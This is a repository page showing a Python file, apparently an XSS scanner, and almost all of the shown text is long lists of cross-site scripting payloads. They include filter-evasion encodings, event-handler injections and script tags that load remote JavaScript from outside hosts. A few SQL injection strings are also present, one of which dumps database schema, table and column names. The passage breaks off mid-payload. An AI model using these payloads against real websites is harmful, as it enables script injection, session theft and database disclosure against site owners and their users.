LonerMJ
/
Security_Code
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
Security_Code/Langzi_Api半成品-不再更新/GET_XSS/get_xss.py

184 lines
394 KiB
Python
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# coding:utf-8
from string import whitespace
import urllib
import urlparse
import mechanize
import httplib
payload_1 = ['</script>"><script>prompt(1)</script>', '</ScRiPt>"><ScRiPt>prompt(1)</ScRiPt>', '"><img src=x onerror=prompt(1)>', '"><svg/onload=prompt(1)>', '"><iframe/src=javascript:prompt(1)>', '"><h1 onclick=prompt(1)>Clickme</h1>', '"><a href=javascript:prompt(1)>Clickme</a>', '"><a href="javascript:confirm%28 1%29">Clickme</a>', '"><a href="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+">click</a>', '"><textarea autofocus onfocus=prompt(1)>', '"><a/href=javascript&colon;co\\u006efir\\u006d&#40;&quot;1&quot;&#41;>clickme</a>', '"><script>co\\u006efir\\u006d`1`</script>', '"><ScRiPt>co\\u006efir\\u006d`1`</ScRiPt>', '"><img src=x onerror=co\\u006efir\\u006d`1`>', '"><svg/onload=co\\u006efir\\u006d`1`>', '"><iframe/src=javascript:co\\u006efir\\u006d%28 1%29>', '"><h1 onclick=co\\u006efir\\u006d(1)>Clickme</h1>', '"><a href=javascript:prompt%28 1%29>Clickme</a>', '"><a href="javascript:co\\u006efir\\u006d%28 1%29">Clickme</a>', '"><textarea autofocus onfocus=co\\u006efir\\u006d(1)>', '"><details/ontoggle=co\\u006efir\\u006d`1`>clickmeonchrome', '"><p/id=1%0Aonmousemove%0A=%0Aconfirm`1`>hoveme', '"><img/src=x%0Aonerror=prompt`1`>', '"><iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;">', '"><h1/ondrag=co\\u006efir\\u006d`1`)>DragMe</h1>']
payload_2 = ['<script>alert(1)</script>', '<scRipt>alErt(1)</scrIpt>', '<img src=x onerror=alert(1)>', '<script type=vbscript>MsgBox(0)</script>', "a'or 2=2--", '<IMG SRC=javascript:alert("XSS")>', '<IMG SRC=JaVaScRiPt:alert("XSS")>', '<BODY ONLOAD=alert("XSS")>', '<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41>', '<IMG SRC=" javascript:alert("XSS");">', '<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>', '<BODY BACKGROUND="javascript:alert("XSS")">', '<IMG DYNSRC="javascript:alert("XSS")">', '<INPUT TYPE="image" DYNSRC="javascript:alert("XSS");">', '<BGSOUND SRC="javascript:alert("XSS");">', '<br size="&{alert("XSS")}">', '<LAYER SRC="http://xss.ha.ckers.org/a.js"></layer>', '<LINK REL="stylesheet" HREF="javascript:alert("XSS");">', '<IMG SRC="vbscript:msgbox("XSS")">', '<IMG SRC="mocha:[code]">', '<IMG SRC="livescript:[code]">', '<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert("XSS");">', '<IFRAME SRC=javascript:alert("XSS")></IFRAME>', '<FRAMESET><FRAME SRC=javascript:alert("XSS")></FRAME></FRAMESET>', '<TABLE BACKGROUND="javascript:alert("XSS")">', '<DIV STYLE="background-image: url(javascript:alert("XSS"))">', '<DIV STYLE="behaviour: url("http://xss.ha.ckers.org/exploit.htc");">', '<DIV STYLE="width: expression(alert("XSS"));">', '<STYLE>@im\\port"\\ja\\vasc\\ript:alert("XSS")";</STYLE>', '<IMG STYLE="xss: expre\\ssion(alert("XSS"))">', '<STYLE TYPE="text/javascript">alert("XSS");</STYLE>', '<XML SRC="javascript:alert("XSS");">', '"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert("XSS");}</SCRIPT><"', '<SCRIPT SRC="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>', '<IMG SRC="javascript:alert("XSS")"', '<SCRIPT a=">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>', '<SCRIPT =">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>', '<SCRIPT a=">" "" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT><SCRIPT "a=">"" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>', '<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>', '<A HREF=http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D>link</A>', '<A HREF=ht://www.google.com/>link</A>', '<A HREF=http://google.com/>link</A>', '<A HREF=http://www.google.com./>link</A>', '<A HREF="javascript:document.location="http://www.google.com/"">link</A>', '<A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>', '<BASE HREF="javascript:alert("XSS");//">', '<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>', '<IMG """><SCRIPT>alert("XSS")</SCRIPT>">', '<IMG SRC=# onmouseover="alert("xxs")">', '<IMG SRC= onmouseover="alert("xxs")">', '<IMG onmouseover="alert("xxs")">', '<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>', '<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">', '<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>', '<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>', '<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>', '<IMG SRC="javascript:alert("XSS");">', '<IMG SRC="jav&#x09;ascript:alert("XSS");">', '<IMG SRC="jav&#x0A;ascript:alert("XSS");">', '<IMG SRC="jav&#x0D;ascript:alert("XSS");">', '<IMG SRC=" &#14; javascript:alert("XSS");">', '<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>', '<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert("XSS")>', '<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>', '<<SCRIPT>alert("XSS");//<</SCRIPT>', '<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >', '<SCRIPT SRC=//ha.ckers.org/.j>', '<IMG SRC="javascript:alert("XSS")"', '<iframe src=http://ha.ckers.org/scriptlet.html <', '\\";alert("XSS");//', '</script><script>alert("XSS");</script>', '</TITLE><SCRIPT>alert("XSS");</SCRIPT>', "<a/onmouseover[\\x0b]=location='\\x6A\\x61\\x76\\x61\\x73\\x63\\x72\\x69\\x70\\x74\\x3A\\x61\\x6C\\x65\\x72\\x74\\x28\\x30\\x29\\x3B'>", '<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>', '<marquee/onstart=confirm(2)>', '<table background="javascript:alert(1)"></table>', '"/><marquee onfinish=confirm(123)>a</marquee>', '<svg/onload=prompt(1);>', '<isindex action="javas&tab;cript:alert(1)" type=image>', '<marquee/onstart=confirm(2)>', '/*!00000concat*/(0x63726561746f723a2064705f6d6d78,0x3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d353e44622056657273696f6e203a20,version(),0x3c62723e44622055736572203a20,user(),0x3c62723e3c62723e3c2f666f6e743e3c7461626c6520626f726465723d2231223e3c74686561643e3c74723e3c74683e44617461626173653c2f74683e3c74683e5461626c653c2f74683e3c74683e436f6c756d6e3c2f74683e3c2f74686561643e3c2f74723e3c74626f64793e,(select%20(@x)%20/*!00000from*/%20(select%20(@x:=0x00),(select%20(0)%20/*!00000from*/%20(information_schema/**/.columns)%20where%20(table_schema!=0x696e666f726d6174696f6e5f736368656d61)%20and%20(0x00)%20in%20(@x:=/*!00000concat*/(@x,0x3c74723e3c74643e3c666f6e7420636f6c6f723d7265642073697a653d333e266e6273703b266e6273703b266e6273703b,table_schema,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e266e6273703b266e6273703b266e6273703b,table_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75652073697a653d333e,column_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c2f74723e))))x))', '<object%00something allowScriptAccess=always data=//0me.me/demo/xss/flash/normalEmbededXSS.swf?', '0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user', '1 AND (select DCount(last(username)&after=1&after=1) from users where username=ad1min)', "1 AND (select DCount(last(username)&after=1&after=1) from users where username='ad1min')", '%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E', '<details ontoggle=alert(1)>', '<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">', '<body style="height:1000px" onwheel="[DATA]">', '<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[DATA]">', '<body style="height:1000px" onwheel="prom%25%32%33%25%32%36x70;t(1)">', '<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="prom%25%32%33%25%32%36x70;t(1)">', '<body style="height:1000px" onwheel="alert(1)">', '<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">', '<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>', '<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>', '?<input type="search" onsearch="aler\\u0074(1)">', '<details ontoggle=alert(1)>']
payload_3 = ['</ScrIpt><script>alert(1)</script>', '<scr<script>ipt>alert("XSS")</scr<script>ipt>', '<div onclick="alert(\'xss\')">', '<div style="color: expression(alert(\'XSS\'))">', '<div style="color: \'<\'; color: expression(alert(\'XSS\'))">', '%c1;alert(/xss/);//', '"onclick=alert(1)//', '"><!-- --><script>alert(xss);<script>', '<script>alert(navigator.userAgent)<script>', '<script>alert(88199)</script>', '<script>confirm(88199)</script>', '<script>prompt(88199)</script>', '<script>\\u0061\\u006C\\u0065\\u0072\\u0074(88199)</script>', '<script>+alert(88199)</script>', '<script>alert(/88199/)</script>', '<script src=data:text/javascript,alert(88199)></script>', '<script src=&#100&#97&#116&#97:text/javascript,alert(88199)></script>', '<script>alert(String.fromCharCode(49,49))</script>', '<script>alert(/88199/.source)</script>', '<script>setTimeout(alert(88199),0)</script>', "<script>document['write'](88199);</script>", '<anytag onmouseover=alert(15)>', '<anytag onclick=alert(16)>', '<a onmouseover=alert(17)>', '<a onclick=alert(18)>', '<a href=javascript:alert(19)>', '<button/onclick=alert(20)>', '<form><button', 'formaction=javascript&colon;alert(21)>', '<form/action=javascript:alert(22)><input/type=submit>', '<form onsubmit=alert(23)><button>', '<form onsubmit=alert(23)><button>', '<img src=x onerror=alert(24)> 29', '<body/onload=alert(25)><body>', 'onscroll=alert(26)><br><br><br><br><br><br><br>', '<br><br><br><br><br><br><br><br><br><br><br>', '<br><br><br><br><br><br><br><br><br><br><br>', '<br><br><br><br><br><br><br><br><br><br><br>', '<input autofocus>', '<iframe src="http://0x.lv/xss.swf"></iframe>', '<iframe/onload=alert(document.domain)></iframe>', '<IFRAME SRC="javascript:alert(29);"></IFRAME>', '<meta http-equiv="refresh" content="0;', 'url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2830%29%3C%2%73%63%72%69%70%74%3E">', '<object data=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+></object>', '<object data="javascript:alert(document.domain)">', '<marquee onstart=alert(30)></marquee>', '<isindex type=image src=1 onerror=alert(31)>', '<isindex action=javascript:alert(32) type=image>', '<input onfocus=alert(33) autofocus>', '<input onblur=alert(34) autofocus><input autofocus>', '<script>alert(1);</script>', '<script>prompt(1);</script>', '<script>confirm (1);</script>', '<a href=\xe2\x80\x9chttp://www.google.com">Clickme</a>', '<a href="rhainfosec.com" onclimbatree=alert(1)>ClickHere</a>', '<a href=\xe2\x80\x9djavascript:alert(1)\xe2\x80\x9d>Clickme</a>', '<body/onhashchange=alert(1)><a href=#>clickit', '<img src=x onerror=prompt(1);>', '<img/src=aaa.jpg onerror=prompt(1);', '<video src=x onerror=prompt(1);>', '<audio src=x onerror=prompt(1);>', '<iframesrc="javascript:alert(2)">', '<iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">', '<embed/src=//goo.gl/nlX0P>', '<form action="Javascript:alert(1)"><input type=submit>', '<isindex action="javascript:alert(1)" type=image>', '<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>', '<isindex action=data:text/html, type=image', '<span class="pln"> </span><span class="tag">&lt;formaction</span><span class="pun">=</span><span class="atv">&amp;#039;data:text&amp;sol;html,&amp;lt;script&amp;gt;alert(1)&amp;lt/script&amp;gt&amp;#039;</span><span class="tag">&gt;&lt;button&gt;</span><span class="pln">CLICK</span>', '<isindexformaction="javascript:alert(1)" type=image>', '<input type="image" formaction=JaVaScript:alert(0)>', '<form><button formaction=javascript&colon;alert(1)>CLICKME', '<table background=javascript:alert(1)></table> // Works on Opera 10.5 and IE6', '<video poster=javascript:alert(1)//></video> // Works Upto Opera 10.5', '<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">', '<object/data=//goo.gl/nlX0P?', '<applet code="javascript:confirm(document.cookie);"> // Firefox Only', '<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>', '<svg/onload=prompt(1);>', '<marquee/onstart=confirm(2)>/', '<body onload=prompt(1);>', '<select autofocus onfocus=alert(1)>', '<textarea autofocus onfocus=alert(1)>', '<keygen autofocus onfocus=alert(1)>', '<video><source onerror="javascript:alert(1)">', '<q/oncut=open()>', '<q/oncut=alert(1)>', '<marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)>', '<body language=vbsonload=alert-1 // Works with IE8', '<command onmouseover="\\x6A\\x61\\x76\\x61\\x53\\x43\\x52\\x49\\x50\\x54\\x26\\x63\\x6F\\x6C\\x6F\\x6E\\x3B\\x63\\x6F\\x6E\\x66\\x6 9\\x72\\x6D\\x26\\x6C\\x70\\x61\\x72\\x3B\\x31\\x26\\x72\\x70\\x61\\x72\\x3B">Save</command>', '<a onmouseover="javascript:window.onerror=alert;throw 1>', '<img src=x onerror="javascript:window.onerror=alert;throw 1">', '<body/onload=javascript:window.onerror=eval;throw&#039;=alert\\x281\\x29&#039;;', '<img style="xss:expression(alert(0))"> // Works upto IE7.', '<div style="color:rgb(&#039;&#039;x:expression(alert(1))"></div>', '<style>#test{x:expression(alert(/XSS/))}</style>', '<a onmouseover=location=\xe2\x80\x99javascript:alert(1)>click', '<body onfocus="location=&#039;javascrpt:alert(1) >123', '<meta http-equiv="refresh" content="0;url=//goo.gl/nlX0P">', '<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>', '<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:\\u0061lert(1);"></g></svg>', '<svg xmlns:xlink=" r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/>', '<svg><![CDATA[><imagexlink:href="]]><img/src=xx:xonerror=alert(2)//"</svg> ', '<meta content="&NewLine; 1 &NewLine;;JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>', '<math><a xlink:href="//jsfiddle.net/t846h/">click', '<svg><script>alert&#40/1/&#41</script>', '<svg><script>alert&#40 1&#41 ', '&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;', '<a href="j&#x26;#x26#x41;vascript:alert%252831337%2529">Hello</a>', '<input value="XSStest" type=text>', '"><imgsrc=x onerror=prompt(0);>', '" autofocusonfocus=alert(1)', '" onmouseover="prompt(0) x="', '" onfocusin=alert(1) autofocus x="', '" onfocusout=alert(1) autofocus x="', '" onblur=alert(1) autofocus a="', '";alert(1) ', '";document.body.addEventListener("DOMActivate",alert(1))', '";document.body.addEventListener("DOMActivate",prompt(1))', '";document.body.addEventListener("DOMActivate",confirm(1))', '<a href=\xe2\x80\x9dUserinput\xe2\x80\x9d>Click</a>', '<a href=\xe2\x80\x9djavascript:alert(1)//\xe2\x80\x9d>Click</a>', 'javascript&#058;alert(1)', 'javaSCRIPT&colon;alert(1)', 'JaVaScRipT:alert(1)', 'javas&Tab;cript:\\u0061lert(1);', 'javascript:\\u0061lert&#x28;1&#x29', 'avascript&#x3A;alert&lpar;document&period;cookie&rpar;', 'vbscript:alert(1);', 'vbscript&#058;alert(1);', 'vbscr&Tab;ipt:alert(1)"', 'encodeURIComponent(&#039;userinput&#039;)', '-alert(1)-', '-prompt(1)-', '-confirm(1)-', 'encodeURIComponent(&#039;&#039;-alert(1)-&#039;&#039;)', 'encodeURIComponent(&#039;&#039;-prompt(1)-&#039;&#039;)', '<svg><script>varmyvar=\xe2\x80\x9dYourInput\xe2\x80\x9d;</script></svg>', 'www.site.com/test.php?var=text\xe2\x80\x9d;alert(1)//', '<svg><script>varmyvar="text&quot;;alert(1)//";</script></svg>', 'src=x onerror=prompt(0);', '???script?alert(1)?/script?', '<scri%00pt>alert(1);</scri%00pt>', '<scri\\x00pt>alert(1);</scri%00pt>', '<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>', '<script>alert(1);</script>', '<%0ascript>alert(1);</script>', '<%0bscript>alert(1);</script>', '<// style=x:expression\\28write(1)\\29>', '<!--[if]><script>alert(1)</script -->', '<?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>', '<%div%20style=xss:expression(prompt(1))>', '<a/onmouseover[\\x0b]=location=&#039;\\x6A\\x61\\x76\\x61\\x73\\x63\\x72\\x69\\x70\\x74\\x3A\\x61\\x6C\\x65\\x72\\x74\\x28\\x30\\x29\\x3B&#039;>rhainfosec', '<iframesrc=&#039;http://www.target.com?foo="xss autofocus/AAAAA onfocus=location=window.name//&#039;', 'name="javascript:alert("XSS")"></iframe>', '<script> vari=location.hash; document.write(i); </script>', '<svg/onload=location=/java/.source+/script/.source+location.hash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.hash[3]//#:()', '<scri%00pt>confirm(0);</scri%00pt>', '<a/onmouseover[\\x0b]=location=&#039;\\x6A\\x61\\x76\\x61\\x73\\x63\\x72\\x69\\x70\\x74\\x3A\\x61\\x6C\\x65\\x72\\x74\\x28\\x30\\x29\\x3B&#039;>rhainfosec', '<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>', '<marquee/onstart=confirm(2)>', '<table background="javascript:alert(1)"></table> ', '"/><marquee onfinish=confirm(123)>a</marquee>', '<svg/onload=prompt(1);> ', '<isindex action="javas&tab;cript:alert(1)" type=image>', '<marquee/onstart=confirm(2)>', '', '', '', '']
payload_4 = ['?><script>alert(?X?)</script>', '?><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', "' '><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', '<script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', '" onerror=alert(1) "', '" onerror=alert(1) x="', '-alert(1)-', '-prompt(1)-', '<marquee/onstart=confirm(1)>', '"><marquee/onstart=confirm(1)>', "'><marquee/onstart=confirm(1)>", '<img src=x onerror=prompt(1);>', '"><img src=x onerror=prompt(1);>', "'><img src=x onerror=prompt(1);>", '<img src=x onerror=prompt(1)>', '"><img src=x onerror=prompt(1)>', "'><img src=x onerror=prompt(1)>", '\'\';!--"<X>=&{()}', '<SCRIPT>+alert("X");</SCRIPT>', '</ScrIpt><SCRIPT>+alert("X");</SCRIPT>', '"><SCRIPT>+alert("X");</SCRIPT>', '</ScrIpt><SCRIPT>+alert("X");</SCRIPT>', '\'><SCRIPT>+alert("X");</SCRIPT>', '</ScrIpt><SCRIPT>+alert("X");</SCRIPT>', '<SCRIPT>+alert("X")</SCRIPT>', '</ScrIpt><SCRIPT>+alert("X")</SCRIPT>', '"><SCRIPT>+alert("X")</SCRIPT>', '</ScrIpt><SCRIPT>+alert("X")</SCRIPT>', '\'><SCRIPT>+alert("X")</SCRIPT>', '</ScrIpt><SCRIPT>+alert("X")</SCRIPT>', '<script>alert(/X/)</script>', '</ScrIpt><script>alert(/X/)</script>', '"><script>alert(/X/)</script>', '</ScrIpt><script>alert(/X/)</script>', "'><script>alert(/X/)</script>", '</ScrIpt><script>alert(/X/)</script>', '<svg><script>varmyvar="text&quot;;alert(1)//";</script></svg>', '"><svg><script>varmyvar="text&quot;;alert(1)//";</script></svg>', '\'><svg><script>varmyvar="text&quot;;alert(1)//";</script></svg>', '<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>', '"><object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>', '\'><object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>', '<math><a xlink:href="//127.0.0.1:3555/xss_serve_payloads/X.js">click', '"><math><a xlink:href="//127.0.0.1:3555/xss_serve_payloads/X.js">click', '\'><math><a xlink:href="//127.0.0.1:3555/xss_serve_payloads/X.js">click', '<embed code="http://127.0.0.1:3555/xss_serve_payloads/flash.swf" allowscriptaccess=always>', '"><embed code="http://127.0.0.1:3555/xss_serve_payloads/flash.swf" allowscriptaccess=always>', '\'><embed code="http://127.0.0.1:3555/xss_serve_payloads/flash.swf" allowscriptaccess=always>', '<script itworksinallbrowsers>/*<script* */alert(1)</script', '"><script itworksinallbrowsers>/*<script* */alert(1)</script', "'><script itworksinallbrowsers>/*<script* */alert(1)</script", '<img src ?itworksonchrome?\\/onerror = alert(1)', '"><img src ?itworksonchrome?\\/onerror = alert(1)', "'><img src ?itworksonchrome?\\/onerror = alert(1)", '<script crossorigin>alert(1);</script>', '"><script crossorigin>alert(1);</script>', "'><script crossorigin>alert(1);</script>", '<script async>alert(1);</script async>', '"><script async>alert(1);</script async>', "'><script async>alert(1);</script async>", '<script charset>alert(1);</script charset>', '"><script charset>alert(1);</script charset>', "'><script charset>alert(1);</script charset>", '<script a b c >alert(1)</script d e f>', '"><script a b c >alert(1)</script d e f>', "'><script a b c >alert(1)</script d e f>", '<img src=x onerror=document.body.innerHTML=location.hash>#"><img src=x onerror=prompt(1)>', '"><img src=x onerror=document.body.innerHTML=location.hash>#"><img src=x onerror=prompt(1)>', '\'><img src=x onerror=document.body.innerHTML=location.hash>#"><img src=x onerror=prompt(1)>', '"><img src=x onerror=prompt(1)>', "'><img src=x onerror=prompt(1)>", '<img src=x onerror=document.body.innerHTML=location.hash>#"><img/src=\'x\'onerror=prompt(1)>', '"><img src=x onerror=document.body.innerHTML=location.hash>#"><img/src=\'x\'onerror=prompt(1)>', '\'><img src=x onerror=document.body.innerHTML=location.hash>#"><img/src=\'x\'onerror=prompt(1)>', '<img src=x onerror=document.body.innerHTML=location.hash>#<img src=x onerror=prompt(1)>', '"><img src=x onerror=document.body.innerHTML=location.hash>#<img src=x onerror=prompt(1)>', "'><img src=x onerror=document.body.innerHTML=location.hash>#<img src=x onerror=prompt(1)>", '"><img src=x onerror=prompt(1)>', "'><img src=x onerror=prompt(1)>", "<img src=x onerror=document.body.innerHTML=location.hash>#<img/src='x'onerror=prompt(1)>", '"><img src=x onerror=document.body.innerHTML=location.hash>#<img/src=\'x\'onerror=prompt(1)>', "'><img src=x onerror=document.body.innerHTML=location.hash>#<img/src='x'onerror=prompt(1)>", '<svg onload=document.body.innerHTML=location.hash>#<img src=x onerror=alert(1)>', '"><svg onload=document.body.innerHTML=location.hash>#<img src=x onerror=alert(1)>', "'><svg onload=document.body.innerHTML=location.hash>#<img src=x onerror=alert(1)>", "<svg onload=document.body.innerHTML=location.hash>#<img src='x'onerror=alert(1)>", '"><svg onload=document.body.innerHTML=location.hash>#<img src=\'x\'onerror=alert(1)>', "'><svg onload=document.body.innerHTML=location.hash>#<img src='x'onerror=alert(1)>", '<svg onload=document.body.innerHTML=location.hash>#<svg onload=prompt(1)>', '"><svg onload=document.body.innerHTML=location.hash>#<svg onload=prompt(1)>', "'><svg onload=document.body.innerHTML=location.hash>#<svg onload=prompt(1)>", '<svg onload=document.body.innerHTML=location.hash>#<svg/onload=prompt(1)>', '"><svg onload=document.body.innerHTML=location.hash>#<svg/onload=prompt(1)>', "'><svg onload=document.body.innerHTML=location.hash>#<svg/onload=prompt(1)>", '--!><svg onload=prompt(1)', 'eval(((_=!1)+{})[1]+(_+{})[2]+(_+{})[4]+((_=!!1)+{})[1]+(_+{})[0]+((_=>(_))+1)[3]+1+((_=>(_))+1)[5])', 'eval((_=!0+(()=>0)+!1)[10]+_[11]+_[3]+_[1]+_[0]+_[4]+1+_[5])', '<marquee>alert( `X :)`)</marquee>', '"><marquee>alert( `X :)`)</marquee>', "'><marquee>alert( `X :)`)</marquee>", '<"script">"alert(0)"</"script">', '"><"script">"alert(0)"</"script">', '\'><"script">"alert(0)"</"script">', "<s[NULL]cript>alert(1)</s[NULL]cript>'>X</a>", '"><s[NULL]cript>alert(1)</s[NULL]cript>\'>X</a>', "'><s[NULL]cript>alert(1)</s[NULL]cript>'>X</a>", '<video><source o?UTF-8?Q?n?error="alert(1)">', '"><video><source o?UTF-8?Q?n?error="alert(1)">', '\'><video><source o?UTF-8?Q?n?error="alert(1)">', '<body scroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>', '"><body scroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>', "'><body scroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>", '<meta charset="x-mac-farsi">??script ??alert(1)//??/script ??', '"><meta charset="x-mac-farsi">??script ??alert(1)//??/script ??', '\'><meta charset="x-mac-farsi">??script ??alert(1)//??/script ??', "<x onload'=alert(1)", '"><x onload\'=alert(1)', "'><x onload'=alert(1)", "<sc'+'ript>alert(1)</script>", '"><sc\'+\'ript>alert(1)</script>', "'><sc'+'ript>alert(1)</script>", '<FRAMESET><FRAME RC=""+"javascript:alert(\'X\');"></FRAMESET>', '"><FRAMESET><FRAME RC=""+"javascript:alert(\'X\');"></FRAMESET>', '\'><FRAMESET><FRAME RC=""+"javascript:alert(\'X\');"></FRAMESET>', '</script>"//\'//<svg%0Aonload=alert(1)//>', '"></script>"//\'//<svg%0Aonload=alert(1)//>', '\'></script>"//\'//<svg%0Aonload=alert(1)//>', '\'//</script><svg%20"%0aonload=alert(1)%20//>', '</script>\'//<svg "%0Aonload=alert(1) //>', '"></script>\'//<svg "%0Aonload=alert(1) //>', '\'></script>\'//<svg "%0Aonload=alert(1) //>', '\'//</script><svg "%0Aonload=alert(1)// />', '</script>"//\'//<svg%0Aonload=alert(1) //>', '"></script>"//\'//<svg%0Aonload=alert(1) //>', '\'></script>"//\'//<svg%0Aonload=alert(1) //>', '</script>\'//<svg "%0Aonload=alert(1)// />', '"></script>\'//<svg "%0Aonload=alert(1)// />', '\'></script>\'//<svg "%0Aonload=alert(1)// />', '</script "//\'//><svg%0Aonload=alert(1)//>', '"></script "//\'//><svg%0Aonload=alert(1)//>', '\'></script "//\'//><svg%0Aonload=alert(1)//>', '\';//</script><svg ";%0Aonload=alert(1)// />#', '</script><img src \'//"%0Aonerror=alert(1)//', '"></script><img src \'//"%0Aonerror=alert(1)//', '\'></script><img src \'//"%0Aonerror=alert(1)//', '</script><svg onload=\'-/"/-[alert(1)]//\'/>', '"></script><svg onload=\'-/"/-[alert(1)]//\'/>', '\'></script><svg onload=\'-/"/-[alert(1)]//\'/>', '</script><img \'//"%0Aonerror=alert(1)// src>', '"></script><img \'//"%0Aonerror=alert(1)// src>', '\'></script><img \'//"%0Aonerror=alert(1)// src>', '</script><img \'//"%0Aonerror=alert(1)// src=1>', '"></script><img \'//"%0Aonerror=alert(1)// src=1>', '\'></script><img \'//"%0Aonerror=alert(1)// src=1>', '</script "/*\'/*><svg */; onload=alert(1) //>', '"></script "/*\'/*><svg */; onload=alert(1) //>', '\'></script "/*\'/*><svg */; onload=alert(1) //>', '</script><script>/*"/*\'/**/;alert(1)//</script>#', '"></script><script>/*"/*\'/**/;alert(1)//</script>#', '\'></script><script>/*"/*\'/**/;alert(1)//</script>#', '</script "/*\'/*><img/src=x */; onerror=alert(1) //', '"></script "/*\'/*><img/src=x */; onerror=alert(1) //', '\'></script "/*\'/*><img/src=x */; onerror=alert(1) //', '</script><script>/*var a="/*""\'/**/;alert(1);//</script>', '"></script><script>/*var a="/*""\'/**/;alert(1);//</script>', '\'></script><script>/*var a="/*""\'/**/;alert(1);//</script>', '<iframe src="data:data:javascript:,% 3 c 